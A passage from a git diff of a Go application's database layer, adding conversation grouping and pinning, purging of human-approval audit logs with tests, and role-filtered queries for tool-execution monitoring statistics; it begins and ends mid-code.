? WHERE id = ?", + name, icon, time.Now(), id, + ) + if err != nil { + return fmt.Errorf("更新分组失败: %w", err) + } + return nil +} + +// DeleteGroup 删除分组 +func (db *DB) DeleteGroup(id string) error { + _, err := db.Exec("DELETE FROM conversation_groups WHERE id = ?", id) + if err != nil { + return fmt.Errorf("删除分组失败: %w", err) + } + return nil +} + +// AddConversationToGroup 将对话添加到分组 +// 注意:一个对话只能属于一个分组,所以在添加新分组之前,会先删除该对话的所有旧分组关联 +func (db *DB) AddConversationToGroup(conversationID, groupID string) error { + // 先删除该对话的所有旧分组关联,确保一个对话只属于一个分组 + _, err := db.Exec( + "DELETE FROM conversation_group_mappings WHERE conversation_id = ?", + conversationID, + ) + if err != nil { + return fmt.Errorf("删除对话旧分组关联失败: %w", err) + } + + // 然后插入新的分组关联 + id := uuid.New().String() + _, err = db.Exec( + "INSERT INTO conversation_group_mappings (id, conversation_id, group_id, created_at) VALUES (?, ?, ?, ?)", + id, conversationID, groupID, time.Now(), + ) + if err != nil { + return fmt.Errorf("添加对话到分组失败: %w", err) + } + return nil +} + +// RemoveConversationFromGroup 从分组中移除对话 +func (db *DB) RemoveConversationFromGroup(conversationID, groupID string) error { + _, err := db.Exec( + "DELETE FROM conversation_group_mappings WHERE conversation_id = ? AND group_id = ?", + conversationID, groupID, + ) + if err != nil { + return fmt.Errorf("从分组中移除对话失败: %w", err) + } + return nil +} + +// GetConversationsByGroup 获取分组中的所有对话 +func (db *DB) GetConversationsByGroup(groupID string) ([]*Conversation, error) { + rows, err := db.Query( + `SELECT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, COALESCE(cgm.pinned, 0) as group_pinned + FROM conversations c + INNER JOIN conversation_group_mappings cgm ON c.id = cgm.conversation_id + WHERE cgm.group_id = ? + ORDER BY COALESCE(cgm.pinned, 0) DESC, c.updated_at DESC`, + groupID, + ) + if err != nil { + return nil, fmt.Errorf("查询分组对话失败: %w", err) + } + defer rows.Close() + + var conversations []*Conversation + for rows.Next() { + var conv Conversation + var createdAt, updatedAt string + var pinned int + var groupPinned int + + if err := rows.Scan(&conv.ID, &conv.Title, &pinned, &createdAt, &updatedAt, &groupPinned); err != nil { + return nil, fmt.Errorf("扫描对话失败: %w", err) + } + + // 尝试多种时间格式解析 + var err1, err2 error + conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt) + if err1 != nil { + conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05", createdAt) + } + if err1 != nil { + conv.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + + conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt) + if err2 != nil { + conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05", updatedAt) + } + if err2 != nil { + conv.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt) + } + + conv.Pinned = pinned != 0 + + conversations = append(conversations, &conv) + } + + return conversations, nil +} + +// SearchConversationsByGroup 搜索分组中的对话(按标题和消息内容模糊匹配) +func (db *DB) SearchConversationsByGroup(groupID string, searchQuery string) ([]*Conversation, error) { + // 构建SQL查询,支持按标题和消息内容搜索 + // 使用 DISTINCT 避免因为一个对话有多条匹配消息而重复 + query := `SELECT DISTINCT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, COALESCE(cgm.pinned, 0) as group_pinned + FROM conversations c + INNER JOIN conversation_group_mappings cgm ON c.id = cgm.conversation_id + WHERE cgm.group_id = ?` + + args := []interface{}{groupID} + + // 如果有搜索关键词,添加标题和消息内容搜索条件 + if searchQuery != "" { + searchPattern := "%" + searchQuery + "%" + // 搜索标题或消息内容 + // 使用 LEFT JOIN 连接消息表,这样即使没有消息的对话也能被搜索到(通过标题) + query += ` AND ( + LOWER(c.title) LIKE LOWER(?) + OR EXISTS ( + SELECT 1 FROM messages m + WHERE m.conversation_id = c.id + AND LOWER(m.content) LIKE LOWER(?) + ) + )` + args = append(args, searchPattern, searchPattern) + } + + query += " ORDER BY COALESCE(cgm.pinned, 0) DESC, c.updated_at DESC" + + rows, err := db.Query(query, args...) + if err != nil { + return nil, fmt.Errorf("搜索分组对话失败: %w", err) + } + defer rows.Close() + + var conversations []*Conversation + for rows.Next() { + var conv Conversation + var createdAt, updatedAt string + var pinned int + var groupPinned int + + if err := rows.Scan(&conv.ID, &conv.Title, &pinned, &createdAt, &updatedAt, &groupPinned); err != nil { + return nil, fmt.Errorf("扫描对话失败: %w", err) + } + + // 尝试多种时间格式解析 + var err1, err2 error + conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt) + if err1 != nil { + conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05", createdAt) + } + if err1 != nil { + conv.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + + conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt) + if err2 != nil { + conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05", updatedAt) + } + if err2 != nil { + conv.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt) + } + + conv.Pinned = pinned != 0 + + conversations = append(conversations, &conv) + } + + return conversations, nil +} + +// GetGroupByConversation 获取对话所属的分组 +func (db *DB) GetGroupByConversation(conversationID string) (string, error) { + var groupID string + err := db.QueryRow( + "SELECT group_id FROM conversation_group_mappings WHERE conversation_id = ? LIMIT 1", + conversationID, + ).Scan(&groupID) + if err != nil { + if err == sql.ErrNoRows { + return "", nil // 没有分组 + } + return "", fmt.Errorf("查询对话分组失败: %w", err) + } + return groupID, nil +} + +// UpdateConversationPinned 更新对话置顶状态 +func (db *DB) UpdateConversationPinned(id string, pinned bool) error { + pinnedValue := 0 + if pinned { + pinnedValue = 1 + } + // 注意:不更新 updated_at,因为置顶操作不应该改变对话的更新时间 + _, err := db.Exec( + "UPDATE conversations SET pinned = ? WHERE id = ?", + pinnedValue, id, + ) + if err != nil { + return fmt.Errorf("更新对话置顶状态失败: %w", err) + } + return nil +} + +// UpdateGroupPinned 更新分组置顶状态 +func (db *DB) UpdateGroupPinned(id string, pinned bool) error { + pinnedValue := 0 + if pinned { + pinnedValue = 1 + } + _, err := db.Exec( + "UPDATE conversation_groups SET pinned = ?, updated_at = ? WHERE id = ?", + pinnedValue, time.Now(), id, + ) + if err != nil { + return fmt.Errorf("更新分组置顶状态失败: %w", err) + } + return nil +} + +// GroupMapping 分组映射关系 +type GroupMapping struct { + ConversationID string `json:"conversationId"` + GroupID string `json:"groupId"` +} + +// GetAllGroupMappings 批量获取所有分组映射(消除 N+1 查询) +func (db *DB) GetAllGroupMappings() ([]GroupMapping, error) { + rows, err := db.Query("SELECT conversation_id, group_id FROM conversation_group_mappings") + if err != nil { + return nil, fmt.Errorf("查询分组映射失败: %w", err) + } + defer rows.Close() + + var mappings []GroupMapping + for rows.Next() { + var m GroupMapping + if err := rows.Scan(&m.ConversationID, &m.GroupID); err != nil { + return nil, fmt.Errorf("扫描分组映射失败: %w", err) + } + mappings = append(mappings, m) + } + + if mappings == nil { + mappings = []GroupMapping{} + } + return mappings, nil +} + +// UpdateConversationPinnedInGroup 更新对话在分组中的置顶状态 +func (db *DB) UpdateConversationPinnedInGroup(conversationID, groupID string, pinned bool) error { + pinnedValue := 0 + if pinned { + pinnedValue = 1 + } + _, err := db.Exec( + "UPDATE conversation_group_mappings SET pinned = ? WHERE conversation_id = ? AND group_id = ?", + pinnedValue, conversationID, groupID, + ) + if err != nil { + return fmt.Errorf("更新分组对话置顶状态失败: %w", err) + } + return nil +} diff --git a/internal/database/hitl_logs.go b/internal/database/hitl_logs.go new file mode 100644 index 00000000..6a5e10b6 --- /dev/null +++ b/internal/database/hitl_logs.go @@ -0,0 +1,75 @@ +package database + +import ( + "fmt" + "strings" + "time" + + "go.uber.org/zap" +) + +// DeleteHitlInterruptLogsByIDs deletes decided HITL audit logs by id (pending rows are skipped). +func (db *DB) DeleteHitlInterruptLogsByIDs(ids []string) (int64, error) { + if db == nil { + return 0, fmt.Errorf("database is nil") + } + clean := make([]string, 0, len(ids)) + for _, id := range ids { + id = strings.TrimSpace(id) + if id != "" { + clean = append(clean, id) + } + } + if len(clean) == 0 { + return 0, nil + } + placeholders := strings.TrimRight(strings.Repeat("?,", len(clean)), ",") + q := fmt.Sprintf(`DELETE FROM hitl_interrupts WHERE status != 'pending' AND id IN (%s)`, placeholders) + args := make([]interface{}, len(clean)) + for i, id := range clean { + args[i] = id + } + res, err := db.Exec(q, args...) + if err != nil { + db.logger.Error("批量删除人机协同审计日志失败", zap.Error(err), zap.Int("count", len(clean))) + return 0, fmt.Errorf("批量删除人机协同审计日志失败: %w", err) + } + n, _ := res.RowsAffected() + return n, nil +} + +// DeleteHitlInterruptLogsMatching deletes decided logs matching whereSQL (e.g. "WHERE 1=1 AND status != 'pending' ..."). +func (db *DB) DeleteHitlInterruptLogsMatching(whereSQL string, args []interface{}) (int64, error) { + if db == nil { + return 0, fmt.Errorf("database is nil") + } + whereSQL = strings.TrimSpace(whereSQL) + if whereSQL == "" { + return 0, fmt.Errorf("where clause is required") + } + q := `DELETE FROM hitl_interrupts ` + whereSQL + res, err := db.Exec(q, args...) + if err != nil { + db.logger.Error("清空人机协同审计日志失败", zap.Error(err)) + return 0, fmt.Errorf("清空人机协同审计日志失败: %w", err) + } + n, _ := res.RowsAffected() + return n, nil +} + +// PurgeHitlInterruptLogsBefore deletes decided logs with decided/created time before cutoff. +func (db *DB) PurgeHitlInterruptLogsBefore(cutoff time.Time) (int64, error) { + if db == nil { + return 0, fmt.Errorf("database is nil") + } + res, err := db.Exec( + `DELETE FROM hitl_interrupts WHERE status != 'pending' AND datetime(COALESCE(decided_at, created_at)) < datetime(?)`, + cutoff.UTC().Format(time.RFC3339), + ) + if err != nil { + db.logger.Error("清理过期人机协同审计日志失败", zap.Error(err)) + return 0, fmt.Errorf("清理过期人机协同审计日志失败: %w", err) + } + n, _ := res.RowsAffected() + return n, nil +} diff --git a/internal/database/hitl_logs_test.go b/internal/database/hitl_logs_test.go new file mode 100644 index 00000000..90958865 --- /dev/null +++ b/internal/database/hitl_logs_test.go @@ -0,0 +1,106 @@ +package database + +import ( + "path/filepath" + "testing" + "time" + + "go.uber.org/zap" +) + +func ensureHitlInterruptsTable(t *testing.T, db *DB) { + t.Helper() + if _, err := db.Exec(` +CREATE TABLE IF NOT EXISTS hitl_interrupts ( + id TEXT PRIMARY KEY, + conversation_id TEXT NOT NULL, + message_id TEXT, + mode TEXT NOT NULL, + tool_name TEXT NOT NULL, + tool_call_id TEXT, + payload TEXT, + status TEXT NOT NULL, + decision TEXT, + decision_comment TEXT, + created_at DATETIME NOT NULL, + decided_at DATETIME +);`); err != nil { + t.Fatalf("create hitl_interrupts: %v", err) + } +} + +func TestDeleteHitlInterruptLogsByIDs_skipsPending(t *testing.T) { + dbPath := filepath.Join(t.TempDir(), "hitl.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer db.Close() + ensureHitlInterruptsTable(t, db) + + now := time.Now().UTC().Format(time.RFC3339) + if _, err := db.Exec(`INSERT INTO hitl_interrupts + (id, conversation_id, mode, tool_name, status, created_at) + VALUES ('pending-1', 'c1', 'approval', 'exec', 'pending', ?)`, now); err != nil { + t.Fatalf("insert pending: %v", err) + } + if _, err := db.Exec(`INSERT INTO hitl_interrupts + (id, conversation_id, mode, tool_name, status, decision, created_at, decided_at) + VALUES ('done-1', 'c1', 'approval', 'exec', 'decided', 'approve', ?, ?)`, now, now); err != nil { + t.Fatalf("insert decided: %v", err) + } + + deleted, err := db.DeleteHitlInterruptLogsByIDs([]string{"pending-1", "done-1"}) + if err != nil { + t.Fatalf("DeleteHitlInterruptLogsByIDs: %v", err) + } + if deleted != 1 { + t.Fatalf("deleted = %d, want 1", deleted) + } + + var status string + if err := db.QueryRow(`SELECT status FROM hitl_interrupts WHERE id = 'pending-1'`).Scan(&status); err != nil { + t.Fatalf("pending row missing: %v", err) + } + if err := db.QueryRow(`SELECT id FROM hitl_interrupts WHERE id = 'done-1'`).Scan(new(string)); err == nil { + t.Fatal("decided row should be deleted") + } +} + +func TestPurgeHitlInterruptLogsBefore(t *testing.T) { + dbPath := filepath.Join(t.TempDir(), "hitl.db") + db, err := NewDB(dbPath, zap.NewNop()) + if err != nil { + t.Fatalf("NewDB: %v", err) + } + defer db.Close() + ensureHitlInterruptsTable(t, db) + + old := time.Now().AddDate(0, 0, -100).UTC().Format(time.RFC3339) + recent := time.Now().AddDate(0, 0, -1).UTC().Format(time.RFC3339) + for _, row := range []struct{ id, decided string }{ + {"old-1", old}, + {"new-1", recent}, + } { + if _, err := db.Exec(`INSERT INTO hitl_interrupts + (id, conversation_id, mode, tool_name, status, decision, created_at, decided_at) + VALUES (?, 'c1', 'approval', 'exec', 'decided', 'approve', ?, ?)`, row.id, row.decided, row.decided); err != nil { + t.Fatalf("insert %s: %v", row.id, err) + } + } + + cutoff := time.Now().AddDate(0, 0, -90) + deleted, err := db.PurgeHitlInterruptLogsBefore(cutoff) + if err != nil { + t.Fatalf("PurgeHitlInterruptLogsBefore: %v", err) + } + if deleted != 1 { + t.Fatalf("deleted = %d, want 1", deleted) + } + if err := db.QueryRow(`SELECT id FROM hitl_interrupts WHERE id = 'old-1'`).Scan(new(string)); err == nil { + t.Fatal("old row should be purged") + } + if err := db.QueryRow(`SELECT id FROM hitl_interrupts WHERE id = 'new-1'`).Scan(new(string)); err != nil { + t.Fatalf("new row should remain: %v", err) + } +} diff --git a/internal/database/monitor.go b/internal/database/monitor.go new file mode 100644 index 00000000..f970c7d4 --- /dev/null +++ b/internal/database/monitor.go @@ -0,0 +1,1105 @@ +package database + +import ( + "database/sql" + "encoding/json" + "strings" + "time" + + "cyberstrike-ai/internal/mcp" + + "go.uber.org/zap" +) + +// SaveToolExecution 保存工具执行记录 +func (db *DB) SaveToolExecution(exec *mcp.ToolExecution) error { + argsJSON, err := json.Marshal(exec.Arguments) + if err != nil { + db.logger.Warn("序列化执行参数失败", zap.Error(err)) + argsJSON = []byte("{}") + } + + var resultJSON sql.NullString + if exec.Result != nil { + resultBytes, err := json.Marshal(exec.Result) + if err != nil { + db.logger.Warn("序列化执行结果失败", zap.Error(err)) + } else { + resultJSON = sql.NullString{String: string(resultBytes), Valid: true} + } + } + + var errorText sql.NullString + if exec.Error != "" { + errorText = sql.NullString{String: exec.Error, Valid: true} + } + + var endTime sql.NullTime + if exec.EndTime != nil { + endTime = sql.NullTime{Time: *exec.EndTime, Valid: true} + } + + var durationMs sql.NullInt64 + if exec.Duration > 0 { + durationMs = sql.NullInt64{Int64: exec.Duration.Milliseconds(), Valid: true} + } + var partialUpdatedAt sql.NullTime + if exec.PartialOutputUpdatedAt != nil { + partialUpdatedAt = sql.NullTime{Time: *exec.PartialOutputUpdatedAt, Valid: true} + } + partialTruncated := 0 + if exec.PartialOutputTruncated { + partialTruncated = 1 + } + + query := ` + INSERT OR REPLACE INTO tool_executions + (id, tool_name, arguments, status, result, error, start_time, end_time, duration_ms, partial_output, partial_output_bytes, partial_output_truncated, partial_output_updated_at, owner_user_id, conversation_id, created_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + ` + + _, err = db.Exec(query, + exec.ID, + exec.ToolName, + string(argsJSON), + exec.Status, + resultJSON, + errorText, + exec.StartTime, + endTime, + durationMs, + sqlNullString(exec.PartialOutput), + exec.PartialOutputBytes, + partialTruncated, + partialUpdatedAt, + strings.TrimSpace(exec.OwnerUserID), + strings.TrimSpace(exec.ConversationID), + time.Now(), + ) + + if err != nil { + db.logger.Error("保存工具执行记录失败", zap.Error(err), zap.String("executionId", exec.ID)) + return err + } + + return nil +} + +// UpdateToolExecutionResult 仅更新结果字段(用于 reduction 后将监控展示与模型上下文对齐)。 +func (db *DB) UpdateToolExecutionResult(id string, result *mcp.ToolResult) error { + id = strings.TrimSpace(id) + if id == "" || result == nil { + return nil + } + resultBytes, err := json.Marshal(result) + if err != nil { + return err + } + _, err = db.Exec(`UPDATE tool_executions SET result = ? WHERE id = ?`, string(resultBytes), id) + if err != nil { + db.logger.Warn("更新工具执行结果失败", zap.Error(err), zap.String("executionId", id)) + } + return err +} + +func sqlNullString(s string) sql.NullString { + if s == "" { + return sql.NullString{} + } + return sql.NullString{String: s, Valid: true} +} + +// CountToolExecutions 统计工具执行记录总数 +func (db *DB) CountToolExecutions(status, toolName string) (int, error) { + return db.CountToolExecutionsForAccess(status, toolName, RBACListAccess{Scope: RBACScopeAll}) +} + +func (db *DB) CountToolExecutionsForAccess(status, toolName string, access RBACListAccess) (int, error) { + query := `SELECT COUNT(*) FROM tool_executions` + args := []interface{}{} + conditions := []string{} + if status != "" { + conditions = append(conditions, "status = ?") + args = append(args, status) + } + if toolName != "" { + // 支持部分匹配(模糊搜索),不区分大小写 + conditions = append(conditions, "LOWER(tool_name) LIKE ?") + args = append(args, "%"+strings.ToLower(toolName)+"%") + } + if len(conditions) > 0 { + query += ` WHERE ` + conditions[0] + for i := 1; i < len(conditions); i++ { + query += ` AND ` + conditions[i] + } + } + query, args = appendToolExecutionAccessSQL(query, args, access, len(conditions) > 0) + var count int + err := db.QueryRow(query, args...).Scan(&count) + if err != nil { + return 0, err + } + return count, nil +} + +// LoadToolExecutions 加载所有工具执行记录(支持分页) +func (db *DB) LoadToolExecutions() ([]*mcp.ToolExecution, error) { + return db.LoadToolExecutionsWithPagination(0, 1000, "", "") +} + +// LoadToolExecutionsWithPagination 分页加载工具执行记录 +// limit: 最大返回记录数,0 表示使用默认值 1000 +// offset: 跳过的记录数,用于分页 +// status: 状态筛选,空字符串表示不过滤 +// toolName: 工具名称筛选,空字符串表示不过滤 +func (db *DB) LoadToolExecutionsWithPagination(offset, limit int, status, toolName string) ([]*mcp.ToolExecution, error) { + if limit <= 0 { + limit = 1000 // 默认限制 + } + if limit > 10000 { + limit = 10000 // 最大限制,防止一次性加载过多数据 + } + + query := ` + SELECT id, tool_name, arguments, status, result, error, start_time, end_time, duration_ms, COALESCE(owner_user_id, ''), COALESCE(conversation_id, '') + FROM tool_executions + ` + args := []interface{}{} + conditions := []string{} + if status != "" { + conditions = append(conditions, "status = ?") + args = append(args, status) + } + if toolName != "" { + // 支持部分匹配(模糊搜索),不区分大小写 + conditions = append(conditions, "LOWER(tool_name) LIKE ?") + args = append(args, "%"+strings.ToLower(toolName)+"%") + } + if len(conditions) > 0 { + query += ` WHERE ` + conditions[0] + for i := 1; i < len(conditions); i++ { + query += ` AND ` + conditions[i] + } + } + query += ` ORDER BY start_time DESC LIMIT ? OFFSET ?` + args = append(args, limit, offset) + + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + + var executions []*mcp.ToolExecution + for rows.Next() { + var exec mcp.ToolExecution + var argsJSON string + var resultJSON sql.NullString + var errorText sql.NullString + var endTime sql.NullTime + var durationMs sql.NullInt64 + + err := rows.Scan( + &exec.ID, + &exec.ToolName, + &argsJSON, + &exec.Status, + &resultJSON, + &errorText, + &exec.StartTime, + &endTime, + &durationMs, + &exec.OwnerUserID, + &exec.ConversationID, + ) + if err != nil { + db.logger.Warn("加载执行记录失败", zap.Error(err)) + continue + } + + // 解析参数 + if err := json.Unmarshal([]byte(argsJSON), &exec.Arguments); err != nil { + db.logger.Warn("解析执行参数失败", zap.Error(err)) + exec.Arguments = make(map[string]interface{}) + } + + // 解析结果 + if resultJSON.Valid && resultJSON.String != "" { + var result mcp.ToolResult + if err := json.Unmarshal([]byte(resultJSON.String), &result); err != nil { + db.logger.Warn("解析执行结果失败", zap.Error(err)) + } else { + exec.Result = &result + } + } + + // 设置错误 + if errorText.Valid { + exec.Error = errorText.String + } + + // 设置结束时间 + if endTime.Valid { + exec.EndTime = &endTime.Time + } + + // 设置持续时间 + if durationMs.Valid { + exec.Duration = time.Duration(durationMs.Int64) * time.Millisecond + } + + executions = append(executions, &exec) + } + + return executions, nil +} + +func toolExecutionsFilterSQL(status, toolName string) (string, []interface{}) { + args := []interface{}{} + conditions := []string{} + if status != "" { + conditions = append(conditions, "status = ?") + args = append(args, status) + } + if toolName != "" { + conditions = append(conditions, "LOWER(tool_name) LIKE ?") + args = append(args, "%"+strings.ToLower(toolName)+"%") + } + if len(conditions) == 0 { + return "", args + } + return ` WHERE ` + strings.Join(conditions, ` AND `), args +} + +// ToolStatsSummary 工具调用汇总(全量聚合,不含逐工具明细) +type ToolStatsSummary struct { + TotalCalls int + SuccessCalls int + FailedCalls int + LastCallTime *time.Time + ToolCount int +} + +// ToolStatsSummaryResult 汇总 + Top N 工具排行 +type ToolStatsSummaryResult struct { + Summary ToolStatsSummary + TopTools []*mcp.ToolStats +} + +// LoadToolStatsSummary 聚合统计信息,仅返回汇总与 Top N 工具(避免全量 map 传输)。 +// 监控页的失败口径只包含真实失败/异常终止;用户主动取消的 cancelled 保留在总调用中,不计入失败。 +func (db *DB) LoadToolStatsSummary(topN int) (*ToolStatsSummaryResult, error) { + if topN <= 0 { + topN = 6 + } + if topN > 100 { + topN = 100 + } + + result := &ToolStatsSummaryResult{ + TopTools: make([]*mcp.ToolStats, 0, topN), + } + + summaryQuery := ` + SELECT COUNT(*), + COALESCE(SUM(CASE WHEN status = 'completed' THEN 1 ELSE 0 END), 0), + COALESCE(SUM(CASE WHEN status IN ('failed', 'hard_timeout', 'orphaned') THEN 1 ELSE 0 END), 0), + MAX(start_time), + COUNT(DISTINCT tool_name) + FROM tool_executions + ` + var lastCallRaw sql.NullString + err := db.QueryRow(summaryQuery).Scan( + &result.Summary.TotalCalls, + &result.Summary.SuccessCalls, + &result.Summary.FailedCalls, + &lastCallRaw, + &result.Summary.ToolCount, + ) + if err != nil { + return nil, err + } + if lastCallRaw.Valid && strings.TrimSpace(lastCallRaw.String) != "" { + if t, parseErr := time.Parse(time.RFC3339Nano, lastCallRaw.String); parseErr == nil { + result.Summary.LastCallTime = &t + } else if t, parseErr := time.Parse("2006-01-02 15:04:05.999999999-07:00", lastCallRaw.String); parseErr == nil { + result.Summary.LastCallTime = &t + } else if t, parseErr := time.Parse("2006-01-02 15:04:05", lastCallRaw.String); parseErr == nil { + result.Summary.LastCallTime = &t + } + } + + topQuery := ` + SELECT tool_name, + COUNT(*) AS total_calls, + SUM(CASE WHEN status = 'completed' THEN 1 ELSE 0 END) AS success_calls, + SUM(CASE WHEN status IN ('failed', 'hard_timeout', 'orphaned') THEN 1 ELSE 0 END) AS failed_calls, + MAX(start_time) AS last_call_time + FROM tool_executions + GROUP BY tool_name + ORDER BY total_calls DESC, tool_name ASC + LIMIT ? + ` + rows, err := db.Query(topQuery, topN) + if err != nil { + return nil, err + } + defer rows.Close() + + for rows.Next() { + var stat mcp.ToolStats + var lastCallTime sql.NullString + if err := rows.Scan( + &stat.ToolName, + &stat.TotalCalls, + &stat.SuccessCalls, + &stat.FailedCalls, + &lastCallTime, + ); err != nil { + db.logger.Warn("加载 Top 工具统计失败", zap.Error(err)) + continue + } + if lastCallTime.Valid { + parsed := parseDBTime(lastCallTime.String) + stat.LastCallTime = &parsed + } + result.TopTools = append(result.TopTools, &stat) + } + + return result, nil +} + +func (db *DB) LoadToolStatsSummaryForAccess(topN int, access RBACListAccess) (*ToolStatsSummaryResult, error) { + if access.Scope == RBACScopeAll { + return db.LoadToolStatsSummary(topN) + } + if topN <= 0 { + topN = 6 + } + if topN > 100 { + topN = 100 + } + result := &ToolStatsSummaryResult{TopTools: make([]*mcp.ToolStats, 0, topN)} + fromSQL, args := appendToolExecutionAccessSQL(` FROM tool_executions`, nil, access, false) + var lastCall sql.NullString + err := db.QueryRow(`SELECT COUNT(*), + COALESCE(SUM(CASE WHEN status = 'completed' THEN 1 ELSE 0 END), 0), + COALESCE(SUM(CASE WHEN status IN ('failed', 'hard_timeout', 'orphaned') THEN 1 ELSE 0 END), 0), + MAX(start_time), COUNT(DISTINCT tool_name)`+fromSQL, args...).Scan( + &result.Summary.TotalCalls, &result.Summary.SuccessCalls, &result.Summary.FailedCalls, + &lastCall, &result.Summary.ToolCount, + ) + if err != nil { + return nil, err + } + if lastCall.Valid { + parsed := parseDBTime(lastCall.String) + result.Summary.LastCallTime = &parsed + } + rows, err := db.Query(`SELECT tool_name, COUNT(*), + SUM(CASE WHEN status = 'completed' THEN 1 ELSE 0 END), + SUM(CASE WHEN status IN ('failed', 'hard_timeout', 'orphaned') THEN 1 ELSE 0 END), MAX(start_time)`+ + fromSQL+` GROUP BY tool_name ORDER BY COUNT(*) DESC, tool_name ASC LIMIT ?`, append(args, topN)...) + if err != nil { + return nil, err + } + defer rows.Close() + for rows.Next() { + var stat mcp.ToolStats + var last sql.NullString + if err := rows.Scan(&stat.ToolName, &stat.TotalCalls, &stat.SuccessCalls, &stat.FailedCalls, &last); err != nil { + return nil, err + } + if last.Valid { + parsed := parseDBTime(last.String) + stat.LastCallTime = &parsed + } + result.TopTools = append(result.TopTools, &stat) + } + return result, rows.Err() +} + +// LoadToolExecutionListPage 分页加载执行记录列表(不含 arguments/result,供监控列表使用) +func (db *DB) LoadToolExecutionListPage(offset, limit int, status, toolName string) ([]*mcp.ToolExecution, error) { + return db.LoadToolExecutionListPageForAccess(offset, limit, status, toolName, RBACListAccess{Scope: RBACScopeAll}) +} + +func (db *DB) LoadToolExecutionListPageForAccess(offset, limit int, status, toolName string, access RBACListAccess) ([]*mcp.ToolExecution, error) { + if limit <= 0 { + limit = 20 + } + if limit > 100 { + limit = 100 + } + + query := ` + SELECT id, tool_name, status, start_time, end_time, duration_ms, COALESCE(owner_user_id, ''), COALESCE(conversation_id, '') + FROM tool_executions + ` + whereSQL, args := toolExecutionsFilterSQL(status, toolName) + query += whereSQL + query, args = appendToolExecutionAccessSQL(query, args, access, whereSQL != "") + query += ` ORDER BY start_time DESC LIMIT ? OFFSET ?` + args = append(args, limit, offset) + + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + + executions := make([]*mcp.ToolExecution, 0, limit) + for rows.Next() { + var exec mcp.ToolExecution + var endTime sql.NullTime + var durationMs sql.NullInt64 + + if err := rows.Scan( + &exec.ID, + &exec.ToolName, + &exec.Status, + &exec.StartTime, + &endTime, + &durationMs, + &exec.OwnerUserID, + &exec.ConversationID, + ); err != nil { + db.logger.Warn("加载执行记录列表失败", zap.Error(err)) + continue + } + if endTime.Valid { + exec.EndTime = &endTime.Time + } + if durationMs.Valid { + exec.Duration = time.Duration(durationMs.Int64) * time.Millisecond + } + executions = append(executions, &exec) + } + + return executions, nil +} + +func appendToolExecutionAccessSQL(query string, args []interface{}, access RBACListAccess, hasWhere bool) (string, []interface{}) { + if access.Scope == RBACScopeAll { + return query, args + } + userID := strings.TrimSpace(access.UserID) + joiner := " WHERE " + if hasWhere { + joiner = " AND " + } + if userID == "" { + return query + joiner + "1=0", args + } + query += joiner + `( + owner_user_id = ? + OR (conversation_id IS NOT NULL AND conversation_id <> '' AND ( + EXISTS (SELECT 1 FROM conversations c WHERE c.id = tool_executions.conversation_id AND c.owner_user_id = ?) + OR EXISTS (SELECT 1 FROM rbac_resource_assignments ra WHERE ra.user_id = ? AND ra.resource_type = 'conversation' AND ra.resource_id = tool_executions.conversation_id) + OR EXISTS (SELECT 1 FROM conversations c JOIN projects p ON p.id = c.project_id WHERE c.id = tool_executions.conversation_id AND p.owner_user_id = ?) + OR EXISTS (SELECT 1 FROM conversations c JOIN rbac_resource_assignments pra ON pra.resource_id = c.project_id WHERE c.id = tool_executions.conversation_id AND pra.user_id = ? AND pra.resource_type = 'project') + )) + )` + args = append(args, userID, userID, userID, userID, userID) + return query, args +} + +// GetToolExecution 根据ID获取单条工具执行记录 +func (db *DB) GetToolExecution(id string) (*mcp.ToolExecution, error) { + query := ` + SELECT id, tool_name, arguments, status, result, error, start_time, end_time, duration_ms, + COALESCE(partial_output, ''), COALESCE(partial_output_bytes, 0), COALESCE(partial_output_truncated, 0), partial_output_updated_at, + COALESCE(owner_user_id, ''), COALESCE(conversation_id, '') + FROM tool_executions + WHERE id = ? + ` + + row := db.QueryRow(query, id) + + var exec mcp.ToolExecution + var argsJSON string + var resultJSON sql.NullString + var errorText sql.NullString + var endTime sql.NullTime + var durationMs sql.NullInt64 + var partialTruncated int + var partialUpdatedAt sql.NullTime + + err := row.Scan( + &exec.ID, + &exec.ToolName, + &argsJSON, + &exec.Status, + &resultJSON, + &errorText, + &exec.StartTime, + &endTime, + &durationMs, + &exec.PartialOutput, + &exec.PartialOutputBytes, + &partialTruncated, + &partialUpdatedAt, + &exec.OwnerUserID, + &exec.ConversationID, + ) + if err != nil { + return nil, err + } + + if err := json.Unmarshal([]byte(argsJSON), &exec.Arguments); err != nil { + db.logger.Warn("解析执行参数失败", zap.Error(err)) + exec.Arguments = make(map[string]interface{}) + } + + if resultJSON.Valid && resultJSON.String != "" { + var result mcp.ToolResult + if err := json.Unmarshal([]byte(resultJSON.String), &result); err != nil { + db.logger.Warn("解析执行结果失败", zap.Error(err)) + } else { + exec.Result = &result + } + } + + if errorText.Valid { + exec.Error = errorText.String + } + + if endTime.Valid { + exec.EndTime = &endTime.Time + } + + if durationMs.Valid { + exec.Duration = time.Duration(durationMs.Int64) * time.Millisecond + } + exec.PartialOutputTruncated = partialTruncated != 0 + if partialUpdatedAt.Valid { + exec.PartialOutputUpdatedAt = &partialUpdatedAt.Time + } + + return &exec, nil +} + +// UserCanAccessToolExecution enforces ownership for monitor detail and mutation +// endpoints. Legacy records without an owner or conversation fail closed for +// non-global users. +func (db *DB) UserCanAccessToolExecution(userID, scope, executionID string) bool { + userID = strings.TrimSpace(userID) + executionID = strings.TrimSpace(executionID) 